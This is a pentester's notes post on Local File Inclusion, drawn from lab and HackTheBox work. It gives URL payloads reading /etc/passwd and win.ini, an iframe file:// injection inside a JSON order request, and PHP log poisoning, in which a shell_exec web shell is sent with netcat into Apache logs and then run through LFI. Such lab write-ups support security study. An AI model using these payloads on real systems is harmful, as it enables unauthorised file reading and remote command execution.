Local File Inclusion
Post

Local File Inclusion

28/01/2023 31/03/2023
shuciran
1

Simple LFI

If an input is accepted on a URL parameter we can try to access any system file and check if whether or not it retrieves the file:

1
2

http://10.11.1.35/section.php?page=/etc/passwd
http://10.11.1.35/section.php?page=C:\Windows\win.ini

iframe LFI <img src=///etc/passwd>

If we get an entry with a frame we can try to execute such a payload that it is possible to read files on the machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 199
Connection: close
Cookie: connect.sid=s%3AyGd29rDOOta_oSwfj5BOgTjQThwvLm0v.1A9F%2BB%2FN8%2FuDhxgwLoT2Uj1rAHgU60MB5c2irg%2F3Vpk

{"basket":[{"_id":"638f116eeb060210cbd83a20","title":"<iframe src=file:///etc/passwd height=1000px width=800px></iframe>","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}

Examples: [[Stocker#^ab97bc]]

PHP Log Poisoning

Contaminating Log Files

Let’s use Netcat to connect to our Windows 10 lab machine on port 80 with an interesting payload:

1
2
3
4
5

kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

HTTP/1.1 400 Bad Request

We can view these logs by opening C:\\xampp\\apache\\logs\\access.log or by using the XAMPP Control Panel.

Our payload should be found near the end of the log file:

1
2
3
4

10.11.0.4 - - [30/Nov/2019:13:55:12 -0500]
"GET /css/bootstrap.min.css HTTP/1.1" 200 155758 "http://10.11.0.22/menu.php?file=\\Windows\\System32\\drivers\\etc\\hosts" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:13:58:07 -0500] "GET /tacotruck.php HTTP/1.1" 200 1189 "http://10.11.0.22/menu.php?file=/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"

Since our payload has been logged, we can attempt LFI execution. Next, we’ll use the LFI vulnerability to include the Apache access.log file that contains our PHP payload. We know the application is using an include statement so the contents of the included file will be executed as PHP code. We’ll build a URL that includes the location of the log as well as our command to be executed (ipconfig) sent as the cmd parameter’s value.

1

http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
06 Exploitation, Local File Inclusion
exploitation lfi log poisoning php